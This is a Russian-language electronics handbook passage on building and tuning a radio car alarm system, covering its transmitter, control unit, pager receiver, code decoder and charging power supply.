Антенна передатчика может иметь два варианта исполнения. Обе конструкции обеспечивают ее скрытую установку внутри салона автомобиля (вблизи стекла). Это хотя и сильно снижает эффективность (КПД) антенны, но зато исключает повреждение радиоканала системы до срабатывания охраны.
Первый вариант выполняется из стальной проволоки длиной примерно 140...160 мм и диаметром 1,5...2 мм, что позволяет ее расположить над стеклом по дуге и закрепить концы стержня под уплотнительную резиновую прокладку стекла переднего или заднего вида. Она не мешает обзору водителя, а снаружи автомобиля при близком рассмотрении будет казаться, что стекло, имеет в этом месте внутреннюю трещину.
Второй вариант может быть установлен только вблизи стекла заднего вида, а для изготовления антенны взят трехпроводный телефонный кабель, имеющий форму в виде пружинящей спирали (ее удобно закрепить вблизи стекла по диагонали ее с помощью резиновых присосок). Такой провод используют в отечественных телефонных аппаратах для соединения разговорной трубки с аппаратом. Все провода спаиваются между собой и соединяются с согласующим устройством. Согласующее устройство с помощью лепестка экрана крепится к корпусу автомобиля под обшивкой в любом удобном месте.
Рис. 2.58. Эквивалентная антенна, нагрузка для настройки передатчика
Для предварительной настройки радиопередатчика потребуется изготовить эквивалентную антенне нагрузку (рис. 2.58), состоящую из четырех включенных параллельно резисторов на конце 50-омного кабеля длиной 1,64 м. Резисторы подойдут типа МЛТ или С2-23 мощностью 1 Вт. Выводы у них скручиваются между собой и припаиваются к кабелю при минимальной длине.
Настройка начинается с задающего кварцевого автогенератора. Для этого между выводами 1 и 2 схемы временно устанавливается резистор номиналом 150 Ом, а также перемычка между выводами 1 — 4. Питание подается на выводы 1 (+12 В) и 3 (общий провод) при подключенном эквиваленте антенны. Далее, вращая подстроенные сердечники L1, L2 и L4, добиваемся на выходе (на эквивалентной нагрузке) максимальной амплитуды сигнала.
Для обеспечения надежной работы передатчика задающий автогенератор настраивается на точку максимальной устойчивости колебаний. Выполняется это следующим образом: вкручиваем сердечник в катушку L1 до получения максимального уровня сигнала генератора, после чего поворачиваем подстроечник на пол-оборота назад, пока не будет заметно уменьшение сигнала. Настройку автогенератора можно также выполнять по максимальному току потребления. Такая методика подробно описана в литературе [Л 12, стр. 125]. При этом необходимо помнить, что работа передатчика в режиме непрерывного сигнала (без модуляции несущей) допускается кратковременно (не более 1 мин), так как транзистор VT4 не имеет теплоотвода — при усилении импульсно-модулированного сигнала он и не нужен.
Измерив амплитуду высокочастотного напряжения на нагрузке, например с помощью высокочастотного осциллографа (С1-99) или вольтметра, можно определить выходную мощность передатчика по формуле:
где:
U — действующее значение напряжения сигнала, [В];
Um — амплитуда сигнала на нагрузке, [В];
R — сопротивление нагрузки, [Ом].
Низкочастотный вольтметр, подключенный к гнездам XS1, XS2, будет измерять Um (стрелочный прибор обеспечивает достаточную точность для определения мощности).
Для удобства настройки приведена таблица с уже посчитанными по этой формуле значениями мощности в зависимости от измеренного напряжения (для нагрузки сопротивлением 45 Ом), а промежуточные значения можно посчитать по формуле.
Таблица 2.3
Um, [В] |
8 |
9 |
10 |
11 |
12 |
12,5 |
13 |
13,5 |
14 |
14,5 |
U, [В] |
5,66 |
6,36 |
7,07 |
7,77 |
8,48 |
8,84 |
9,19 |
9,54 |
9,9 |
10,25 |
Р, [Вт] |
0,77 |
0,90 |
1,11 |
1,34 |
1,60 |
1,73 |
1,88 |
2,02 |
2,18 |
2,34 |
Если измеренная мощность будет меньше чем 1,8 Вт (из-за низкого коэффициента усиления транзистора VT4), то вместо резистора обратной связи по постоянному току R9 можно установить перемычку. В схеме элементы, отмеченные "*", могут потребовать подбора.
Рабочая частота передатчика не должна отклоняться от номинальной 26945 кГц более чем на 1,34 кГц (измеряем частотомером ЧЗ-63 на эквиваленте нагрузки в режиме кратковременной работы передатчика без модуляции). Окончательная настройка выполняется при подключенной цифровой схеме блока управления.
Блок управления
Управление включением передатчика, а также формирование временных интервалов и модулирующего сигнала осуществляет схема, приведенная на рис. 2.59. Она собрана на КМОП микросхемах, что позволяет получить малое потребление тока в ждущем режиме. При этом все основные временные интервалы получены без использования электролитических конденсаторов, что обеспечивает высокую надежность работы и стабильность параметров в широком температурном диапазоне.
Рис. 2.59. Схема управления
Питание на схему блока охраны подается группой контактов поляризованного реле (К1.1). Реле К1 является герметичным и имеет две обмотки. Оно не требует постоянного питания для фиксации контактов в нужном положении. Кнопка SB1 выполняет включение охраны, а скрытно установленная кнопка SB2 выключает блок.
Для того чтобы исключить быстрое выключение охраны вором, вместо одной кнопки SB2 можно использовать несколько последовательно соединенных или же установить миниатюрное гнездо многоконтактного разъема, в ответной части которого припаивается нужная перемычка. Временная установка в гнездо такого "ключа" отключит охрану.
В начальный момент подачи питания короткий импульс, сформированный цепью C2-R4 и C4-R5, устанавливает триггеры микросхемы D2 в исходное состояние (лог. "О" на выходе D2/1, лог. "1" на D2/12). Датчик на двери водителя F1 подключен на вход элемента D1.1, а конденсатор С1 предотвращает срабатывание элемента D1.1, а значит, и триггера D2.1 от дребезга контактов датчика при его переключении.
Схема переходит в ждущий режим охраны, когда после выхода из машины будет закрыта дверь водителя. В этом случае по фронту положительного перепада напряжения на входе D2.1/3 триггер переключится и появится сигнал лог. "1" на входе D2.2/9, что разрешает срабатывание D2.2 от очередного замыкания любых охранных датчиков.
Рис. 2.60. Форма модулирующих импульсов
При включении режима ОХРАНА лог. "1" на входе D1.4/9 разрешает работу автогенератора на элементах микросхемы D1.3 и D1.4 (все временные соотношения в устройстве зависят от частоты этого генератора). При этом будут работать счетчики D3 и D4. Индикатором перехода схемы в режим ОХРАНА является мигание светодиода HL1. Через интервал времени, задаваемый двоичным кодом на входах счетчика D4, на выходе D4/23 кратковременно (около 1 с) появится лог. "1" (через 4 мин). Проходя через элементы D7.2 и D7.3, высокий уровень включает коммутатор D5.2, который подает питание на задающий автогенератор передатчика.
На элементах микросхем D8, D9 и D11 собран формирователь пачки из 7 модулирующих импульсов, рис. 2.60. Работа такого формирователя подробно описана в первом разделе, (рис. 1.46.). А если вместо микросхемы D8 установить К561ИЕ8, число импульсов в пачке может быть увеличено до 8 или 9.
При срабатывании датчика F1 ВЧ сигнал будет прерывистым, а звуковая сирена включится через 6 с на интервал времени 18 с. Режим работы сирены 18 с и пауза 6 с будут повторяться в течение времени, пока на выходе счетчика D10/12 не появится лог. "1". Этот уровень через диод VD7 подается на обнуление триггера D2.2, что вернет счетчики D6 и D10 в исходное состояние. Время работы сигнализации в режиме ТРЕВОГА после однократного срабатывания любого датчика зависит от положения переключателя SA2.
В случае постоянного замыкания любого другого датчика F2...Fn звуковой сигнал будет включен без задержки и непрерывно. Высокочастотная модуляция передатчика будет также непрерывной (пачками импульсов). По длительности интервала, в течение которого работает звуковой сигнализатор, хозяин сможет определить, какая группа датчиков сработала, и отличить сигнал именно своей охраны.
Включение звукового сигнализатора выполняет высокий уровень сигнала с выходов счетчика D6.2. Через диоды VD8, VD9 он поступает на управление коммутатором D5.3. Транзистор VT1 подает питание на звуковой сигнализатор (ток нагрузки транзистора может быть до 5 А). Показанное на схеме включение транзистора позволяет закрепить его непосредственно на корпусе передатчика, обеспечивая теплоотвод, что избавляет от необходимости использовать дополнительный радиатор.
Рис. 2.61. Доработка схемы
При желании в сигнализацию можно ввести функцию кратковременной звуковой индикации установки режима ОХРАНА. Дополнительно установленный транзистор VT2, показанный на схеме (рис. 2.61 а), позволяет включить звуковой сигнализатор на 1 с (пока идет заряд конденсатора С7 от появившегося напряжения лог. "1" на выходе D2.1/1) при переходе схемы в режим ОХРАНА.
Для подключения к сигнализации датчика с нормально замкнутыми контактами в схему нужно внести изменения, показанные на рис. 2.616, а для подключения датчика колебаний можно воспользоваться рекомендациями, приведенными в статье [Л13].
При правильном монтаже устройство будет работать сразу, а настройка схемы заключается в установке резистором R7 частоты автогенератора 600 Гц на элементах D1.3, D1.4 и проверки формируемых временных интервалов:
а) появление сигнала проверки радиоканала — кратковременное включение передатчика через 4 мин после первоначального включения и установки ре жима ОХРАНА (интервал при необходимости можно увеличить во время первоначальной настройки с помощью цифрового двоичного кода на входах счетчика D4);
б) включение звукового сигнализатора через 6 с после открывания двери водителя и чередование интервалов: работа сигнализатора 18с — пауза 6 с;
в) включение звукового сигнала и работа передатчика при срабатывании любого другого датчика F2...Fn.
Светодиод с красным цветом свечения (включаемый коммутатором D5.4) позволяет обеспечить контроль за состоянием датчиков F2...Fn, а также формирование сигнала на включение сирены без ее подключения.
Топология печатной платы для схемы управления не разрабатывалась, а монтаж выполняется на универсальной макетной плате. Корпус передатчика может быть изготовлен из любого токопроводящего материала и состоит из двух отсеков, в одном из которых расположена плата управления. При этом конструкция корпуса должна предусматривать защиту от проникновения влаги внутрь.
Для удобства настройки и проверки режимов работы блока охраны на корпусе передатчика установлен переключатель SA1 (из серии ПГ2-5). Он позволяет, не вскрывая корпуcа, проверить все основные параметры передатчика. Так при замкнутых контактах датчика F2 и положении SA1: 1 — на выходе XW1 будут пачки из 7 импульсов; положение 2 — непрерывная генерация для измерения частоты и мощности передатчика; 3 — модуляция меандром, что обеспечивает удобство настройки каскадов передатчика, а так же измерение частоты низкочастотного задающего генератора на D1.3, D1.4 (сигнал снимается с эквивалента нагрузки после детектора, рис. 2.58.).
Сдвоенный светодиод HL1 можно заменить двумя обычными с разным цветом свечения. А в качестве диодов VD1...VD3 и VD6...VD10 могут использоваться любые импульсные. Транзистор КТ825 может иметь любую последнюю букву в обозначении. Микросхемы серии К561 заменяются аналогичными из серий КР1561 или 564.
Основным источником питания всего устройства является аккумулятор автомобиля, но предусмотрено подключение и резервного источника напряжением 12,6 В (G1). В ждущем режиме ОХРАНА блок потребляет не более 2,5 мА
(в основном за счет работы светодиода). При включении высокочастотного блока передатчика потребляемый ток не должен превышать 150 мА (если модуляция осуществляется пачками импульсов).
Рис. 2.62. Индикатор ВЧ поля
Окончательная настройка передатчика выполняется после установки на автомобиль. Для этого потребуется изготовить индикатор поля (рис. 2.62) или любой аналогичный из опубликованных в литературе [Л12], с помощью которого можно настроить антенну передатчика сердечником катушки L6 на максимальное излучение. Положение 1 переключателя SA1 в индикаторе поля позволяет предотвратить повреждение механизма измерительного прибора при транспортировке (катушка L1 имеет 11 витков провода МТ диаметром 2,51 мм на каркасе диаметром 25 мм с отводом от третьего витка, а дроссель L2 типа ДМ — 0,2-60 мкГн).
Радиоприемник
Приемник предназначен для приема амплитудно-модулированных сигналов на фиксированной частоте 26945 кГц. Для удобства его использования прием производится на встроенную рамочную антенну.
Известно, что дальность работы данной системы в основном зависит от чувствительности приемника. Чтобы увеличить дальность в 2 раза, необходимо во столько же раз увеличить чувствительность приемника или в 4 раза увеличить мощность передатчика (увеличивать мощность передатчика более 2 Вт нельзя из-за предъявляемых требований к таким устройствам).
Приемник, используемый в системе охраны, должен обеспечивать также длительную непрерывную работу от автономного источника питания. Так как отечественная промышленность не выпускает подходящих высокочастотных микросхем, которые способны работать от низковольтного питания в режиме малых токов, при этом обеспечивая высокую чувствительность, электрическую схему высокочастотной части приемника пришлось выполнять на дискретных элементах (рис. 2.63), что делает ее доступной для повторения....
Рис. 2.63. Высокочастотная часть приемника
Основные технические параметры приемника:
Высокочастотная часть приемника работает в режиме микротоков и построена по супергетеродинной схеме. Входной контур, состоящий из индуктивноети рамочной антенны WA1 и конденсаторов С1, СЗ, С5, а также контур L2-C12 ограничивают полосу принимаемых частот, что увеличивает помехоустойчивость приема и избирательность по зеркальному каналу. На транзисторе VT1 собран усилитель высокой частоты (УВЧ) приемника. Гетеродин на транзисторе VT2 стабилизирован по частоте кварцевым резонатором ZQ1 (26480 кГц). Это позволяет не проводить подстройку приемника на частоту передатчика в процессе эксплуатации.
Рис. 2.64. Конструкция катушек L1 и L2 приемника
Промежуточная частота 465 кГц выделяется смесителем, выполненным на транзисторе VT3. Усилитель ПЧ собран на транзисторах VT4, VT6...VT8. Пьезофильтр ZQ2 (ФП1П1-61,02) обеспечивает хорошее подавление сигналов соседних каналов. Усиленный сигнал ПЧ выделяется на контуре L5-C28, с которого через индуктивную связь подается на активный детектор из транзистора VT13.
Рис. 2.65. Конструкция рамочной антенны приемника WA1
Использование активного детектора позволяет ему работать при значительно меньшем уровне входного сигнала, чем это обеспечивают диодные схемы. После усиления транзисторами VT14 и VT9 выделенные низкочастотные импульсы поступают на дешифратор.
Транзистор VT5 используется в системе автоматической регулировки усиления. На диодном включении транзисторов VT10...VT12 собран низковольтный стабилизатор рабочих режимов усилительных каскадов, что необходимо для работы приемника в широком диапазоне питающих напряжений. По сравнению с обычными диодами транзисторные переходы дают лучшую стабилизацию при работе на малом токе.
Pис. 2.66. а) Топология печатной платы приемника
Рис. 2.66. 6) Расположение элементов
В схеме применены резисторы С2-23, подстроенный конденсатор С1 типа К4-236, остальные конденсаторы типа К10-17 или КМ6 (те из них, что применяются в контурах, лучше установить с минимальным ТКЕ). Электролитические конденсаторы С6, С8, С16, СЗЗ и С35 типа К50-16 на 6,3 В.
Катушки L1 и L2 выполнены на каркасе диаметром 5 мм проводом ПЭВ-2 диаметром 0,23 мм, рис. 2.64, и содержат: L1 — 12 витков, L2 — 12 витков с отводом от середины. Конструкция катушек контуров промежуточной частоты показана на рис. 2.17. Они выполняются проводом ПЭЛ диаметром 0,1 мм и содержат: L3 и L4 по 80 витков, L5 — обмотка 1-2 — 80 витков (ее индуктивность примерно 120 мкГн), 3-4 — 120 витков (намотка начинается с обмотки 3-4).
Рис. 2.67. Форма напряжения в контрольных точках
Антенна WA1 — выполнена печатными проводниками на монтажной плате из двухстороннего стеклотекстолита толщиной 1,0 мм и размерами 125х65 мм и содержит три витка, рис. 2.65. Печатные проводники второго слоя показаны пунктиром. Печатная плата, используемая для монтажа элементов приемника и закрепления трех аккумуляторов, приведена на рис. 2.66. Она содержит две перемычки, устанавливаемые до начала монтажа. Большинство резисторов располагаются вертикально, что уменьшает размеры конструкции. Аккумуляторы размещаются в картонных каркасах по их диаметру и прижимаются сверху печатной платой с размерами 95х30 мм (на этой же плате располагается дешифратор). Часть элементов основной платы, отмеченные штрихом, относятся к схеме дешифратора.
Настройка приемника начинается с усилителя промежуточной частоты на максимальное усиление. Для этого с генератора Г4-176 на базу VT3 через разделительный конденсатор 1000 пФ подаем сигнал 465 кГц (с точностью 0,5 кГц) с импульсной 100% модуляцией меандром на частоте 1 кГц. Изменяя амплитуду сигнала генератора от 100 мВ до 1 мкВ с помощью сердечников катушек L8, L6 и L5, получаем максимальное напряжение на выходе детектора. Сигнал удобно контролировать осциллографом, а его форма на коллекторе транзисторов VT13 и VT14 показана на рис. 2.67. Номинал резистора R33 может потребовать подбора, так чтобы при отсутствии входного сигнала на коллекторе VT14 было нулевое напряжение.
Окончательную регулировку УПЧ проводим при амплитуде выходного сигнала (Uq) не более 200 мВ. Если УПЧ после настройки не обеспечивает достаточного усиления, то вместо резисторов R16 и R12 можно установить перемычки и повторить настройку.
Настройка гетеродина на рабочую частоту выполняется по следующему методу:
а) от генератора Г4-176 подать сигнал уровнем 1 мВ на частоте 26945 кГц с импульсной 100% модуляцией меандром (1 кГц) на виток связи, закрепленный на пластине (рис. 2.68) (WA1 содержит два витка и выполняется проводом МГШВ диаметром 0,2 мм на прямоугольном каркасе с размерами 80х150 мм);
Рис. 2.68. Виток связи для настройки приемника при подаваемом с
генератора сигнале
б) вращая подстроенный сердечник поочередно в катушках L2, L3 и L4, необходимо получить максимальную амплитуду импульсов на выходе детектора, а окончательную подстройку проводим при сигнале Uq не более 120 мВ (в этом случае работа каскада автоматической регулировки усиления не будет снижать уровень сигнала, мешая настройке приемника на максимальную чувствительность);
в) настройка антенны WA1 на рабочую частоту проводится конденсатором С1 при уровне сигнала, подаваемом с генератора, менее 2 мкВ (можно установить перемычки вместо R3 и R23, если это не приведет к самовозбуждению каскадов).
После этого можно проверить действие автоматической регулировки усиления. Увеличивая ВЧ сигнал с генератора на 80 дБ, осциллографом контролируем ширину импульсов tu на коллекторе VT14 — длительность импульсов не должна увеличиваться более чем на 30% относительно начальной. Необходимо также проверить работу схемы при изменении питающего напряжения от 3 до 4,5 В. На этом настройка высокочастотной части приемника считается законченной, и можно подключать дешифратор кода.
Дешифратор
Цифровая часть дешифратора позволяет выделить на фоне помех и других сигналов "свой". Схема простого дешифратора индивидуального кода приведена на рис. 2.69.
Так как от данной системы не требуется иметь дешифратор на много возможных вариантов кода, схему удалось выполнить всего на трех микросхемах. При этом используется свойство КМОП микросхем работать при низковольтном питании.
Пачки входных импульсов поступают на формирователь, собранный из элементов R1, С1 и D1.1. Такая схема предотвращает срабатывание повторителя сигнала D1.1 от кратковременных помех, а также обеспечивает крутые фронты импульсов на выходе, независимо от их крутизны на входе.
С выхода D1.1/3 импульсы поступают на счетчик импульсов D2 и детектор паузы, собранный на элементах R2, С2, VD1, D1.2. Пока на выходе D1.1 действует уровень лог. "0", конденсатор С2 через диод VD1 быстро разряжается и на выходе D1.2/4 будет действовать лог. "0". В паузе между пачками импульсов С2 постепенно зарядится через резистор R2 и на выходе D1.2 сформируются импульсы, положительный фронт которых выполняет запись состояния с выхода счетчика D2/10 в триггер D3.1. Этот же импульс, поступая на вход R, переводит счетчик D2 в исходное состояние (обнуляет). Данный процесс периодически повторяется при появлении очередной пачки импульсов на входе. Диаграмма напряжений, показанная на рис. 2.70, поясняет работу схемы.
Если число импульсов в пачке равно 7, на выходе D2/10 появляются импульсы, высокий уровень которых записывается в регистр триггера D3.1. На триггерах D3.1 и D3.2 собраны формирователи интервалов длительностью 1,5 и 35 с соответственно. Цепь из элементов R6-C5 исключает случайную запись в триггер D3.2 лог. "1" в момент включения питания приемника.
Светодиод HL1 индицирует наличие принятого кода, и по его состоянию можно легко определить, какая группа датчиков на охраняемом автомобиле сработала.
Рис. 2.69. Электрическая схема дешифратора
Так, при кратковременном срабатывании любого из датчиков HL1 будет мигать с интервалом около 2 с. Если же он постоянно светится, то, значит, постоянно замкнут один из датчиков F2...Fn. В случае, если включился звук оповещения, а светодиод не светится, — скорее всего дешифратор сработал от помехи (исключение составляет однократное срабатывание звукового сигнала приемника при включении режима проверки радиоканала).
Рис. 2.70. Эпюры напряжения в контрольных точках
Триггер D3.2 при появлении на его выводе 13 лог. "1" разрешает работу низкочастотного автогенератора на элементах D1.3, D1.4 в течение времени не менее 35 с. Этот интервал не зависит от того, какой из датчиков замкнулся. Звуковой сигнал в приемнике будет звучать, пока работает передатчик, а также некоторое время после его отключения (до 35 с). Выключение звукового сигнала выполняется кнопкой SB1, если светодиод не светится, или же выключателем SA1, в случае продолжения работы передатчика.
В качестве звукового сигнализатора использован пьезоизлучатель типа ЗП-25 (ЗП-22, ЗП-18). А для того чтобы повысить громкость его работы при низковольтном питании, параллельно с пьезокерамическим излучателем включена катушка 11. Она содержит 400 витков провода ПЭЛ диаметром 0,08 мм (0,1 или 0,12 мм), намотанных на склеенных клеем БФ-2 ("Момент") двух кольцах типоразмера К10х6х3 мм из феррита 700НМ1 (или 1000НН). Подбором номинала резистора R10 можно настроить частоту низкочастотного генератора так, чтобы громкость звукового сигнала была максимальной.
Предварительную проверку работы дешифратора удобно выполнять, подавая инверсный сигнал с модулятора передатчика на вход элемента D1.1.
В схеме применены резисторы МЛТ, конденсаторы типа К10-17, а С4 — К50-16.
Корпус приемника имеет такую же конструкцию, как и в опубликованном выше электрошоковом устройстве (две платы, одна из которых одновременно является антенной, образуют каркас, на который одевается кожух). Некоторые
стойки крепления между платами являются одновременно соединительными цепями.
После окончательной сборки и настройки приемника нужно измерить потребляемый схемой ток. Он не должен превышать значений, указанных в технических параметрах. Причиной повышенного потребления тока может быть ошибочное подключение полярности электролитических конденсаторов или ошибки монтажа.
Для уменьшения размеров дешифратора в схеме можно применять аналогичные микросхемы с планарным расположением выводов из серии 564.
Если на данной частоте имеется большой уровень помех, то большую помехоустойчивость может обеспечить дешифратор кода, схема которого описана в литературе [Л11, стр. 140]. Она содержит в два раза больше микросхем, но позволяет последовательно запоминать три принятых кодовых посылки, и, если не менее двух из них правильные — схема принимает решение о достоверном приеме своего сигнала.
Источник питания с автоматическим зарядным устройством
Для того чтобы не разряжать аккумулятор приемника при использовании системы охраны, находясь дома, он подключается к стационарному сетевому источнику. Схема, рис. 2.71, контролирует состояние аккумуляторов и при необходимости автоматически выполняет их подзаряд. Кроме этого, в случае появления сигнала тревоги транзистор VT1 выполняет усиление громкости звукового сигнала оповещения, что обеспечивает удобство эксплуатации.
Рис. 2.71. Схема источника питания с зарядным устройством
Рис. 2.72. Топология печатной платы п расположение элементов для схемы
источника питания
Индикатором включения источника питания в сеть является свечение зеленого светодиода (HL1), а при работе режима подзарядки аккумуляторов светится красный (HL2).
Устройство работает следующим образом. Микросхема D1 выполняетстабилизацию выходного напряжения, уровень которого может ступенькой меняться (6,6 или 5В — это зависит от того, светится светодиод HL2 или нет). Светодиод HL2 кроме световой индикации процесса заряда является еще и источником опорного напряжения 1,6 В для микросхемы.
На транзисторах VT2 и VT3 собран анализатор уровня выходного напряжения источника питания. Из-за большого коэффициента усиления этих транзисторов они переключаются из запертого состояния в открытое при изменении напряжения на выходе на 0,1 В. Схема при подключенных аккумуляторах на страивается резистором R8 так, чтобы порог открывания транзисторов составлял примерно 3,9...4 В (при этом светодиод HL2 не должен светиться).
Величина тока через аккумуляторы зависит от их состояния, и по мере заряда он постепенно снижается. Максимальный ток заряда ограничен величиной примерно 20 мА (задается номиналом резистора R5). По мере роста емкости заряда напряжение на аккумуляторах постепенно растет, и, когда оно достигнет величины 3,9 В, выходное напряжение стабилизатора D1 уменьшится с 6,6 В до 5 В. При этом подзаряд прекратится.
В схеме применены постоянные резисторы МЛТ, подстроечный R8 типа СП5-2; электролитические конденсаторы К50-35 на 25 В. Диоды можно заменить любыми на ток не менее 500 мА и обратное напряжение 50 В. Светодиоды использованы разных цветов из серии КИП32 или аналогичные с малым потребляемым током при свечении. Трансформатор подойдет из унифицированных, например типа ТН 1-220-50 или любой другой с напряжением во вторичной обмотке 9...12 В.
Вариант топологии печатной платы и расположение элементов для схемы источника питания приведен на рис. 2.72.
Конструктивно корпус источника питания выполняется в виде подставки под приемник, но так, чтобы при этом вертикально установленный приемник подключался через гнездо соответствующего разъема (Х1) к цепям источника питания. Разъем Х1 применен типа МРН4.
Источник питания с автоматическим зарядным устройством
Для того чтобы не разряжать аккумулятор приемника при использовании системы охраны, находясь дома, он подключается к стационарному сетевому источнику. Схема, рис. 2.71, контролирует состояние аккумуляторов и при необходимости автоматически выполняет их подзаряд. Кроме этого, в случае появления сигнала тревоги транзистор VT1 выполняет усиление громкости звукового сигнала оповещения, что обеспечивает удобство эксплуатации.
Рис. 2.71. Схема источника питания с зарядным устройством
Рис. 2.72. Топология печатной платы п расположение элементов для схемы
источника питания
Индикатором включения источника питания в сеть является свечение зеленого светодиода (HL1), а при работе режима подзарядки аккумуляторов светится красный (HL2).
Устройство работает следующим образом. Микросхема D1 выполняетстабилизацию выходного напряжения, уровень которого может ступенькой меняться (6,6 или 5В — это зависит от того, светится светодиод HL2 или нет). Светодиод HL2 кроме световой индикации процесса заряда является еще и источником опорного напряжения 1,6 В для микросхемы.
На транзисторах VT2 и VT3 собран анализатор уровня выходного напряжения источника питания. Из-за большого коэффициента усиления этих транзисторов они переключаются из запертого состояния в открытое при изменении напряжения на выходе на 0,1 В. Схема при подключенных аккумуляторах на страивается резистором R8 так, чтобы порог открывания транзисторов составлял примерно 3,9...4 В (при этом светодиод HL2 не должен светиться).
Величина тока через аккумуляторы зависит от их состояния, и по мере заряда он постепенно снижается. Максимальный ток заряда ограничен величиной примерно 20 мА (задается номиналом резистора R5). По мере роста емкости заряда напряжение на аккумуляторах постепенно растет, и, когда оно достигнет величины 3,9 В, выходное напряжение стабилизатора D1 уменьшится с 6,6 В до 5 В. При этом подзаряд прекратится.
В схеме применены постоянные резисторы МЛТ, подстроечный R8 типа СП5-2; электролитические конденсаторы К50-35 на 25 В. Диоды можно заменить любыми на ток не менее 500 мА и обратное напряжение 50 В. Светодиоды использованы разных цветов из серии КИП32 или аналогичные с малым потребляемым током при свечении. Трансформатор подойдет из унифицированных, например типа ТН 1-220-50 или любой другой с напряжением во вторичной обмотке 9...12 В.
Вариант топологии печатной платы и расположение элементов для схемы источника питания приведен на рис. 2.72.
Конструктивно корпус источника питания выполняется в виде подставки под приемник, но так, чтобы при этом вертикально установленный приемник подключался через гнездо соответствующего разъема (Х1) к цепям источника питания. Разъем Х1 применен типа МРН4.
Простая система радиооповещения
Иногда для дистанционного оповещения при охране гаража или машины достаточно простейшей системы. В этом случае может пригодиться предлагае мое устройство, состоящее из радиопередатчика, работающего на фиксированной частоте 26945 кГц и узкополосного приемника.
Электрическая схема передатчика приведена на рис. 2.73. Высокочастотная часть состоит из двух каскадов на транзисторах VT1, VT2 и имеет минимальное число настроечных элементов.
Pиc. 2.73. Радиопередатчик
Это упрощает его изготовление и обеспечивает работу схемы без подстройки передатчика в диапазоне частот 26...30 МГц
при смене задающего рабочую частоту кварца.
Катушки дросселей L1 и L2 наматываются проводом ПЭЛ диаметром 0,12 мм на корпусе резистора МЛТ-0,5 с номинальным сопротивлением 1...1.8 кОм и содержат 50 витков (конструкция показана на рис. 2.56). Катушки L3, L4 и L5 выполняются на диэлектрическом каркасе диаметром 5 мм с резьбой для вкручивания латунного сердечника с резьбой М4. Они содержат соот-
ветственно 14, 14 и 15 витков провода ПЭЛ диаметром 0.4...0,5 мм. Катушка L4 располагается горизонтально на монтажной плате. В качестве сердечника можно использовать латунные винты (для этого потребуется спилить головку и выполнить прорезь — шлиц для отвертки). Перед вкручиванием сердечников их смазываем любым несохнущим вязким герметиком.
В схеме применены резисторы МЛТ. неполярные конденсаторы К10-17 (с минимальным ТКЕ), подстроечный С10 типа К4-236, электролитический С4 — К52-1 на 22 В.
Модулирующая часть передатчика выполнена на одной цифровой микросхеме КМОП серии. На элементах D1.2 и D1.3 собран генератор низкочастотных импульсов с частотой (около 1000 Гц), которые коммутируют с помощью электронного ключа на элементе микросхемы D1.4 питание на высокочастотный автогенератор. Модулирующую частоту можно с помощью изменения элементов С2, R2 и R3 устанавливать любую в диапазоне от 300 до 2000 Гц.
Когда цепь датчика F1 замкнута — генератор не работает и вся схема в ждущем режиме потребляет микроток (не более 0,05 мА). При размыкании F1 — включается передатчик. Работающий передатчик с импульсной 100% модуляцией потребляет ток не более 100 мА.
Напряжение питания схемы передатчика может находиться в диапазоне 9...13 В. При этом выходная мощность передатчика в импульсе составляет не более 0,8 Вт.
Настройка схемы заключается в получении с помощью подстроенных сердечников катушек максимальной амплитуды выходного ВЧ сигнала. Для этого сначала подключаем эквивалентную антенне активную нагрузку, рис. 2.74, и сердечником катушек L3, L4 и конденсатором С10 добиваемся резонанса в контурах П-фильтра.
Окончательная подстройка выполняется при подключенной антенне по индикатору электромагнитного поля с помощью ферритового сердечника катушки L5 и конденсатора С11. Простейшая схема широкополосного индикатора поля показана на рис. 2.75. Один из возможных вариантов выполнения индикатора поля приведен на рис. 2.62.
Антенной передатчика может служить металлический штырь (800...1200 мм) или же любой натянутый провод длиной примерно 1...2.5 м. При установке устройства на стационарном объекте антенна из провода меньше привлекает внимание и иногда позволяет сделать ее по размерам соизмеримой с длиной волны (до 10 м), что повышает эффективность излучения сигнала.
При переносном варианте конструкции передатчика в качестве антенны удобно использовать телескопическую, от любого бытового радиоприемника или телевизора. А для питания устройства подойдут 8 аккумуляторов типа НКГЦ-0,5.
Рис. 2.74. Подключение эквивалентной антенне нагрузки для настройки передатчика
Рис. 2.75. Широкополосный индикатор поля
Все элементы схемы радиопередатчика расположены на печатной плате размером 105х35 мм из одностороннего стеклотекстолита толщиной 1...2 мм, рис. 2.76.
Высокочастотная часть приемника выполнена на аналоговой интегральной микросхеме DA1 (К174ХА2) по супергетеродинной схеме, рис. 2.77. Внутренний гетеродин стабилизирован по частоте кварцем ZQ1 (26480 кГц), что обеспечивает надежность приема при изменении температуры и питающего напряжения. Частота гетеродина выбрана ниже частоты принимаемого сигнала на 465 кГц. Выделяемая внутренним смесителем промежуточная частота усиливается и поступает на детектор VD2. Диод VD1 улучшает работу встроенной системы автоматической регулировки усиления при приеме импульсно-модулированных
сигналов. Что обеспечивает работоспособность приемника и на близком расстоянии от передатчика.
Предварительный усилитель высокочастотного сигнала на транзисторе VT1 позволяет увеличить чувствительность приемника до 3...5 мкВ (внутренние шумы микросхемы ограничивают дальнейшее увеличение чувствительности). Входной контур L1-C2-C3 и коллекторный транзистор VT1 (C5-L3) настраиваются на частоту передатчика с помощью ферритовых сердечников. Антенной приемника может быть штырь из жесткой проволоки длиной 400 мм.
Рис. 2.76. Топология печатной платы и расположение элементов радиопередатчика
Рис. 2.77. Высокочастотная часть приемника
Низкочастотные импульсы после детектора VD2 поступают на усилитель, собранный на транзисторах VT2...VT3, рис. 2.78. Номинал резисторов R13 и R18 подбирается так, чтобы при входном низкочастотном сигнале амплитудой 20 мВ
(для настройки синусоидальный сигнал подать от генератора) — выходной имел симметричное ограничение амплитуды.
Для того чтобы приемник давал сигнал оповещения только при приеме своего (на фоне других сигналов и помех), на элементах С26...С28, L7 собран узкополосный фильтр на частоту примерно 1000 Гц. Полоса фильтра составляет 200 Гц. В случае появления на выходе детектора приемника частоты в данном диапазоне с уровнем более 20 мВ на выходе логического элемента DD1.2/8 появятся короткие импульсы. Они заряжают конденсатор С30 до уровня лог. "1". В этом случае на выходе инвертора DD1.3/12 появится лог. "О". Диод VD4 запирается, что разрешает работу звукового автогенератора на DD1.4, DD1.5. Частоту генератора можно подстроить с помощью резистора R23 так, чтобы получить максимальную громкость работы пьезоизлучателя ЗГИ 8 (ЗП-25). Обычно эта частота около 2 кГц (внутренний резонанс излучателя).
Топология односторонней печатной платы приемника приведена на рис. 2.79. Элементы R22, R23 и С31 расположены над микросхемой DD1. Для получения высокой плотности монтажа большинство резисторов устанавливаются вертикально на плате.
